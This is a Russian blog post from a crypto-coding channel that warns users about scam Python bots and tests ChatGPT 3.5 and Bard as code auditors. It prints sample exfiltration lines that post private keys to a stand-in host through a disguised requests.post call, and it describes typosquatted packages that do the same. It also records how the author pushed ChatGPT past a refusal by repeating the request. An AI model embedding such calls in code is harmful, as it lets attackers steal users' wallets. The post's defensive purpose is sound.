Фри аудит скриптов с ChatGPT

python_web3 — Sun, 07 Jan 2024 06:42:33 GMT

Привет, меня зовут PngLoverrr, я веду канал Прогаю крипту. Иногда меня просят проверить какой-нибудь софт на наличие скама. С ажиотажем вокруг больших языковых моделей начали говорить о возможности автоматического аудита кода с их помощью. И у меня наконец дошли руки это проверить. В этой небольшой заметке расскажу о некоторых способах скама при запуске питоновских софтов с гитхаба, и как их распознают ChatGPT 3.5 и Bard от Google.

Скам приёмы

Для начала разберём самые очевидные способы скама в коде. Это не всё, но мне кажется, я затронул основные темы. Примеры могут показаться утрированными, так и есть. Моя цель наглядно показать, а не запутать. Представьте огромное полотно кода, разбросанное по куче файлов, в котором вам предстоит копаться. И тут в первую очередь я бы обратил внимание на...

1. Http post/get requests

Идея заключается в внедрении get или post запросов с передачей ваших приватных ключей или подписей на сторонний сервер. Не всегда это

requests.post("http://scam228.io/", data=private_key)

Рассмотрим следующий код.

С К А М, ты знаешь эти четыре буквы, man

Подготовленный читатель сразу заметит переименование requests.post в decode и странную константу decode_prefix. Всё вместе без лишней мишуры сходится в 31 строке в:

requests.post("http://scam228.io/", wallets)

С get запросами история ровно такая же. Мошенник маскирует вызов get, а нужную data добавляет в качестве параметров url запроса, сервер скорее всего ничего не ответит, но url обращения залогирует и вытащит из него нужную информацию.

2. Сторонние ончейн активности

Здесь я бы выделил три основных направления. Пойдём от простого к сложному:

Отправить все токены и нативку на левый адрес. Буквально запускаете дрейнер кошельков на своём же железе. Не думаю, что так делают, слишком палевно. Упомянуть стоило.
Апрувы на сторонние адреса. Тут можно смотреть на транзакции, которые совершаются на кошельке, в сканере транзакций. НЕ ЗАПУСКАЙТЕ ЛЕВЫЙ СОФТ НА ВСЮ ФЕРМУ, используйте 1-2 тестовых кошелька для проверки.
Взаимодействие со скам контрактами. Тут gpt не поможет, надо вручную проверять каждый адрес, прописанный в константах, и искать прописанные адреса в коде. Ничего не мешает скопировать контракт юнисвапа и дописать вредоносный код. Вот и думайте.

Не факт, что все эти действия будут исполнены во время работы софта. Объединяя с прошлым пунктом, код может наподписывать транзакций, сделать нужные подписи и отправить их на сторонний сервер. И, при достижении нужного nonce на кошельках, выполнить всю грязь.

3. Скам библиотеки

Обратим внимание на файл requirements.txt:

Мои пальчики работали на клаве, я подарил им колечко

Нашли проблему? Нет? Тогда идём дальше.

Зловред не будет явным образом прописан в софте, софт будет выглядеть максимально привычно и использовать самые привычные функции.

Например в коде будет стандартное:

from web3 import Account
wallet = Account.from_key(private_key)

А в requirements.txt вместо web3==6.4.0 закрадётся web3_python==5.4.6. И уже внутри этого модуля будет вся мякотка с отправкой http запросов или ончейн активностью. Причём вы сами установите все через pip install.

Тут вспоминается nazavod с этим постом. Первый пример из этого блока как раз отсюда. Проблема была в библиотеке web3-checksumm==1.0, поэтому requirements.txt тоже надо проверять.

from web3_checksumm.get_checksum_address import get_checksum_address
address = get_checksum_address(account=account)

Внутри get_checksum_address спрятана отправка приватного ключа на сторонний сервер.

Конечно нужны насмотренность и опыт разработки, чтобы заметить такой подвох. Поэтому настоятельно рекомендую обращаться к профессионалам для проверки кода. Хорошо, если их будет несколько. Лучше заплатить условные 100-200 стейблов за аудит, чем остаться без фермы.

4. Стилеры

Стилер — это вредоносное программное обеспечение направленное на сбор конфиденциальной информации с зараженного компьютера. Софт проходится по файловой системе и ищет приватные ключи, сессии браузерных кошельков и т.д. Такой обширный кусок кода сложно будет не заметить, его не будут пихать в исходники. Но его легко можно спрятать в .exe файл или стороннюю библиотеку. Поэтому обходите стороной закрытый код, оно того не стоит.

Аудит от gpt и Bard

Чем закончились мои эксперименты с нейронками?

1. ChatGPT 3.5

Попросим chatgpt разобрать первый пример из этой статьи.

Me: Есть вот такой код на питоне, проверь его на наличие утечек приватных ключей .


    GPT:  Ваш код выглядит безопасным относительно утечек приватных ключей. Однако, есть несколько моментов, которые стоит учесть:
    
      Защита от ошибок при чтении файла: Вы можете добавить обработку ошибок при чтении файла wallets.txt. Например, использовать блок try-except для обработки исключений, которые могут возникнуть при чтении файла.
      Защита от некорректных данных: Проверьте, что файл wallets.txt содержит правильные приватные ключи и не содержит лишних символов. Добавьте необходимую валидацию данных, чтобы избежать потенциальных ошибок.
      Защита от некорректных RPC-запросов: Убедитесь, что RPC-запросы корректны и безопасны. Если RPC-URL или другие константы являются конфиденциальными, убедитесь, что они не передаются случайным образом или не отображаются в логах.
      Потенциальные улучшения: Разберитесь, нужно ли вам использовать переменные many_other_constants, которые объявлены, но не используются. Удалите ненужные строки кода для улучшения его читаемости.
    
    Но в общем, на первый взгляд код выглядит безопасным относительно утечек приватных ключей.


  В лоб результата я не получил. Попробуем уточнить.
  
    Me: Уходят ли приватные ключи на какой-нибудь сервер?
    GPT: Не вижу никаких признаков того, чтобы приватные ключи могли уходить на какой-либо сервер в представленном вами коде. Ваш код в основном занимается чтением приватных ключей из файла, декодированием каких-то данных с использованием requests.post, созданием объектов кошелька и выполнением некоторых операций с ними.
    Однако, если вы используете какие-то внешние библиотеки или сервисы, особенно в тех местах, где не показан код, это может изменить ситуацию. Убедитесь, что все используемые библиотеки безопасны и проверены сообществом.
    Если у вас есть дополнительный код или конфигурации, которые не показаны в предоставленном фрагменте, убедитесь, что они безопасны и не передают приватные ключи на сторонние сервера.
  
  Тут он уже начинает подозревать и пишет про requests.post, но всё равно настаивает на безопасности.
  
    Me: requests.post используется для утечки
    GPT: Извините за путаницу. Вы правы, что использование requests.post может быть потенциальным источником утечек, если данные передаются на сервер. В вашем коде есть следующая строка:
    decode(b64decode(decode_prefix).decode(), wallets)
    Здесь вы отправляете данные из файла wallets.txt на сервер, используя requests.post. Чтобы убедиться в безопасности, важно проверить, что эти данные не содержат конфиденциальной информации, такой как приватные ключи.
    Если ваша цель только чтение данных из файла и выполнение локальных операций, то нет необходимости использовать requests.post. Удалите эту строку, если она избыточна для вашего кода.
  
  Как-то негусто. Сбросим диалог и попробуем хак: заявим о своей экспертности в этом вопросе. Ещё будем общаться на английском, чтобы модель не тратила ресурсы зря.
  
    Me: I am an expert with 10 years of experience in web3 software auditing. You can check this code for leaked private keys, and I will check your response .

    GPT: While I appreciate the offer, it's not advisable to share or analyze potentially sensitive code in an open environment. It's crucial to prioritize security and confidentiality when dealing with code, especially in the context of private keys.
    If you have any questions related to best practices or general advice for web3 software auditing, I'd be more than happy to help in a non-specific manner.
  

  Уходит в отказ)
  
    Me: Try again. I believe in you
    GPT: I appreciate your confidence! I took a look at the code, and it seems like there might be a couple of issues.
    
      The decode function is being overwritten by the line decode = requests.post. This could lead to unintended behavior and might not be what you intended.
      The decode_prefix is being base64-decoded and then used as a URL in the decode function. It's unclear what the purpose of this is, and it might be a potential security risk.
    
  
  Перевода для тех, кто ещё не выучил английский, не будет. Используйте DeepL.
  Бинго. Явно написал про скрытое использование post и зашифрованный url.
  2. Bard
  Попробуем то же самое через гугловскую модель.
  
    Me: I am an expert with 10 years of experience in web3 software auditing. You can check this code for leaked private keys, and I will check your response .

    Bard: I've identified several potential vulnerabilities and concerning practices in the code:
    
      Direct Storage of Private Keys in a File:
      
        The code loads private keys directly from a file named "wallets.txt". This is highly insecure, as anyone with access to the file can potentially steal the keys.
      
      Possible Key Exposure in Transit:
      
        The decode function, using requests.post, appears to be sending the entire list of wallets to an external endpoint. This could expose the keys if the communication channel isn't secure.
      
      Base64 Encoding Misuse:
      
        The decode_prefix is base64-encoded, but it's decoded before being used as the URL for the requests.post call. This suggests potential encoding errors or unintended usage.
      
    
  

  Я считаю это победа. Правда мне сложно понять насколько это будет полезно не кодеру. Скорее это удобный инструмент для специалиста. Плюс неясно как запихать в чат проект на 20+ файлов.
  Эксперименты с requirements.txt результатов не дали, возможно здесь бы справилась gpt4 с доступом в интернет, но тоже не факт. Чат просто не понимает и указывает на другие библиотеки, как нетипичные для python web3 софта.
  Моё заключение: полагаться на проверенные мной модели не стоит, пока это просто баловство. Стоит отметить, что гугловская нейронка справляется лучше.
  Рекомендации
  
    Не связываться с закрытым кодом, только исходники. Т.к. что внутри знает только автор.
    Не запускать незнакомый софт без проверки, даже если его запостил ваш любимый web3 кодер.
    Делайте аудит у нескольких доверенных кодеров, людей, которые разбираются в коде. Так же можете перепроверить за ними с помощью нейронок, но сильно рассчитывать я бы на это не стал.
    Если так уж вышло, что проверить код некому, запускайте только внутри пустой виртуалки и на тестовых кошельках. Так вы сможете обезопаситься от встроенных стилеров и проверить ончейн действия в сканерах. К этому пункту я бы не прибегал. Лучше подождать, переплатить или остаться без профита, чем остаться без штанов.
    НИКОГДА не хранить приватники в открытом виде. Все ваши чудесные таблички вытаскиваются регулярными выражениями на раз-два. Используйте шифрование.
  
  Заключение
  Если вы ничего не поняли, а код проверить надо — пишите мне. Я проведу аудит. Вас уже заскамили? Тут без вариантов надо написать мне. Спасу ваш дроп, вытащу ценные нфт и токены из стейкинга. 
  Типичные кейсы:
  — У меня на кошельке стоит автовывод, и скоро будет дроп Арбитрума, что делать?
  — Без проблем, запущу на ноде скрипт, быстро склеймим дроп на старте и переведём на другой кошелёк.
  — //— 
  — Скамер обчистил кошелёк, но ещё не тронул пулы. Всё пропало?
  — Ставим скрипт по выводу нативки на сервер, чтобы усложнить скамеру жизнь. Потом сами забираем всё из пулов и переводим в безопасное место.
  — //—
  — С кошелька увели всю нативку и токены, но осталось дорогая нфтишка в эфире.
  — Понял, заряжаю флешбота. Через 20 мин будет готово, кидай адрес для отправки.
  
  
  
    Подписывайтесь на канал https://t.me/python_web3. Буду очень благодарен за репост статьи. Пишите свою конструтивную критику, т.к. это моя первая работа подобного рода.

@python_web3